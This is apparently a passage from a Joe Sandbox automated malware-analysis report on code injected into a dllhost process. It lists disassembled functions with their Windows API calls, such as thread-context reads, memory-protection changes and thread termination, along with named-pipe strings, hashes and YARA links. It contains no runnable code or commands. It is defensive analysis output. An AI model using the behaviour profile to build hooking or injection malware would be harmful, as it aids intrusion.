Part of subcall function 00000279A92760A0: GetCurrentThreadId.KERNEL32 ref: 00000279A92760A4

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 4c9ea15ea0e5767476d13f4b715dc00e9bffaac5431df93a423a9ac5a114b26e
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 4AD1AB3660AB8886DB70DB4AE49835A77A0F3C8B98F510116EECD577A9DF3CC591CB01

Function 00000279A92A6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000279A92A62AB
GetThreadContext.KERNEL32 ref: 00000279A92A6415

Part of subcall function 00000279A92A60A0: GetCurrentThreadId.KERNEL32 ref: 00000279A92A60A4

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 8e6d0e124834aba2f85b9f3ecbc94da23a494134c7798b0ce6af0e2a68077de2
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 3BD18B7720AB8889DB70DB1AE49835A77A0F388B98F114116EECD47BA5DF3DC591CB04

Function 00000279A9272098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000279A92720A6
TlsFree.KERNEL32 ref: 00000279A927225F
TlsFree.KERNEL32 ref: 00000279A927226B
TlsFree.KERNEL32 ref: 00000279A9272277
TlsFree.KERNEL32 ref: 00000279A9272283
TlsFree.KERNEL32 ref: 00000279A927228F

Part of subcall function 00000279A9275E50: GetCurrentThreadId.KERNEL32 ref: 00000279A9275E66

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 3d646bb622f1b65c555b98d963c83bc91fd4aa67e01f566f7d99af59e472c7fe
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 2351CB3520BB459EEF05DF29EC9869433A1FB04764F860825ED2D167A6EF78C598C341

Function 00000279A92A2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000279A92A20A6
TlsFree.KERNEL32 ref: 00000279A92A225F
TlsFree.KERNEL32 ref: 00000279A92A226B
TlsFree.KERNEL32 ref: 00000279A92A2277
TlsFree.KERNEL32 ref: 00000279A92A2283
TlsFree.KERNEL32 ref: 00000279A92A228F

Part of subcall function 00000279A92A5E50: GetCurrentThreadId.KERNEL32 ref: 00000279A92A5E66

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: eed914dc639f07539974a1c5cb33d1459f43a64bfae543a0dee5be96f78adebc
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: A851EE3620BB459DEF05DF14E8D969833A1FB04765F860825AD2D07BA6EF78CA98C340

Function 00000279A92735C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,00000279A92724D1), ref: 00000279A92735EB
HeapAlloc.KERNEL32(?,?,?,?,?,00000279A92724D1), ref: 00000279A92735FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,00000279A92724D1), ref: 00000279A9273673
GetProcessHeap.KERNEL32(?,?,?,?,?,00000279A92724D1), ref: 00000279A92736D9
HeapFree.KERNEL32(?,?,?,?,?,00000279A92724D1), ref: 00000279A92736E7

Strings

$cnt-, xrefs: 00000279A927366C

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $cnt-
API String ID: 756756679-2536841369
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 8697c04afa3e428bede2d753a602efcc3cfbc87b7fe3acccd28374828fdd0098
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 5B31922270BB518BEB29DF16F54876963A0FB44BA4F0A8020CF4C27B55EF38C4E18704

Function 00000279A92A35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,00000279A92A24D1), ref: 00000279A92A35EB
HeapAlloc.KERNEL32(?,?,?,?,?,00000279A92A24D1), ref: 00000279A92A35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,00000279A92A24D1), ref: 00000279A92A3673
GetProcessHeap.KERNEL32(?,?,?,?,?,00000279A92A24D1), ref: 00000279A92A36D9
HeapFree.KERNEL32(?,?,?,?,?,00000279A92A24D1), ref: 00000279A92A36E7

Strings

$cnt-, xrefs: 00000279A92A366C

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $cnt-
API String ID: 756756679-2536841369
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 3effccf53b3f8fe5cade01ff4c028225a889997388ec41c9b3f9a532a0c49e9f
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 92318E2270AB518FEB69DF16E58876963A0FB44FA4F0A8020DF4D07B55EF38D4E18704

Function 00000279A927C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000279A927C94F
SetLastError.KERNEL32 ref: 00000279A927C96E
FlsSetValue.KERNEL32 ref: 00000279A927C997
FlsSetValue.KERNEL32 ref: 00000279A927C9A8
FlsSetValue.KERNEL32 ref: 00000279A927C9B9

Part of subcall function 00000279A927D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000279A927674A), ref: 00000279A927D2B6
Part of subcall function 00000279A927D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000279A927674A), ref: 00000279A927D2C0

SetLastError.KERNEL32 ref: 00000279A927C9DC

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: f658ca13e646096a9d18bef38774ec5ddeaf282909ecb85c257f6c514dfbdd46
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: BD11862530F7508AFB54AB71681D3BE3251BBC57B0F964624AC6E767CACE38D4C18300

Function 00000279A92AC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000279A92AC94F
SetLastError.KERNEL32 ref: 00000279A92AC96E
FlsSetValue.KERNEL32 ref: 00000279A92AC997
FlsSetValue.KERNEL32 ref: 00000279A92AC9A8
FlsSetValue.KERNEL32 ref: 00000279A92AC9B9

Part of subcall function 00000279A92AD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000279A92A674A), ref: 00000279A92AD2B6
Part of subcall function 00000279A92AD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000279A92A674A), ref: 00000279A92AD2C0

SetLastError.KERNEL32 ref: 00000279A92AC9DC

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: ace980ef25080d505fc04628aa9cd0b1a19ff0e19314daf801a2f8bf60c4b403
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: C611542631F3514EFB54A732681D3BE2191BBC57B0F964624AC6E56FDADE28C8C18300

Function 00000279A9271A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000279A9271A56
K32GetModuleFileNameExW.KERNEL32 ref: 00000279A9271A74
PathFindFileNameW.SHLWAPI ref: 00000279A9271A83
lstrlenW.KERNEL32 ref: 00000279A9271A8F
StrCpyW.SHLWAPI ref: 00000279A9271AA2
CloseHandle.KERNEL32 ref: 00000279A9271AB0

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: ecf444d445257eaba96855e57a1db3d642f8831c28f7a9a0e8c4e79102e02a8e
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: F001292571AB408AEB14DF12A89875963A1FB88FE0F8980759E9D43795EE3CC985C780

Function 00000279A92A1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000279A92A1A56
K32GetModuleFileNameExW.KERNEL32 ref: 00000279A92A1A74
PathFindFileNameW.SHLWAPI ref: 00000279A92A1A83
lstrlenW.KERNEL32 ref: 00000279A92A1A8F
StrCpyW.SHLWAPI ref: 00000279A92A1AA2
CloseHandle.KERNEL32 ref: 00000279A92A1AB0

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 1040e325c2543e98eb1e65ee772f935458091240106824406a398b84e819ad8b
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 60016D2570AB408AEB50DB12A89C75963E1F78CFE0F4940349E8E47B55DE3CC9C5C740

Function 00000279A9273E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000279A9273AAC), ref: 00000279A9273E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000279A9273AAC), ref: 00000279A9273E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000279A9273AAC), ref: 00000279A9273E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000279A9273AAC), ref: 00000279A9273E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000279A9273AAC), ref: 00000279A9273E9F
TerminateThread.KERNEL32(?,?,?,?,?,00000279A9273AAC), ref: 00000279A9273EAE

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 9ca58b2f5a5d50ddf5c0c018dbcaf6995bb4866b09242242e985dd050f6a6aa6
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: BB01406921BB408AFB249F26F88CB1573A0BF59B65F054024CD4D16765EF3DC4C8C700

Function 00000279A92A3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000279A92A3AAC), ref: 00000279A92A3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000279A92A3AAC), ref: 00000279A92A3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000279A92A3AAC), ref: 00000279A92A3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000279A92A3AAC), ref: 00000279A92A3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000279A92A3AAC), ref: 00000279A92A3E9F
TerminateThread.KERNEL32(?,?,?,?,?,00000279A92A3AAC), ref: 00000279A92A3EAE

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 63ab2b3c58fc2eef87633db1c618660823861a87764befb47eefdc0623a80a97
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 7F01406961BB408AFB649B25F88C71573E0BF59B65F050424DE4E0A7A5EF3DC5D8C700

Function 00000279A9271AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000279A9271AF4
StrCmpNIW.SHLWAPI ref: 00000279A9271B0E
lstrlenW.KERNEL32 ref: 00000279A9271B1D
StrCpyW.SHLWAPI ref: 00000279A9271B32

Strings

\\?\, xrefs: 00000279A9271B02

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: f152cea283674a87619d4040ed76564c551190e95ced888b0c93fabd2a09b3f1
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 4DF062623197859AEB208F21F5CC7596361F784BA8FC59071DE4D46955EF7CC6C8CB00

Function 00000279A92A1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000279A92A1AF4
StrCmpNIW.SHLWAPI ref: 00000279A92A1B0E
lstrlenW.KERNEL32 ref: 00000279A92A1B1D
StrCpyW.SHLWAPI ref: 00000279A92A1B32

Strings

\\?\, xrefs: 00000279A92A1B02

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 1a5433768c75a611c323c02f44aa59f9fec194420ba5c2f5315806f595a9fd7c
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 47F0AF223097849AEB608B20F8CC75963A0F784BA8F858021CE4E46A54DE7CC6C8CB00

Function 00000279A927B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000279A927B929
GetProcAddress.KERNEL32 ref: 00000279A927B93F
FreeLibrary.KERNEL32 ref: 00000279A927B95B

Strings

mscoree.dll, xrefs: 00000279A927B920
CorExitProcess, xrefs: 00000279A927B938

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: addf4d0b1db663fa9274f214804e69731fa87a5a48a7b25dfd0c1b1dc081baf0
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: D8F03A6521BB4189FF248B24A8997796360FB897B0F964619DE7E4A5E8CF3CC4C8C740

Function 00000279A9273708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,00000279A927275A), ref: 00000279A927372A
StrCpyW.SHLWAPI ref: 00000279A927373A
StrCatW.SHLWAPI ref: 00000279A9273746
PathCombineW.SHLWAPI(?,?,00000000,00000279A927275A), ref: 00000279A9273754

Strings

\\.\pipe\, xrefs: 00000279A9273720

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 6340827b4e17e5010663d386bbe62111d39e6c6662646d18c5087f83cbc619dd
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 89F08C69709B9086EB149F13B918119A260BB48FE1F4AC070EE0E17B18DF2CC4858700

Function 00000279A92AB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000279A92AB929
GetProcAddress.KERNEL32 ref: 00000279A92AB93F
FreeLibrary.KERNEL32 ref: 00000279A92AB95B

Strings

mscoree.dll, xrefs: 00000279A92AB920
CorExitProcess, xrefs: 00000279A92AB938

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
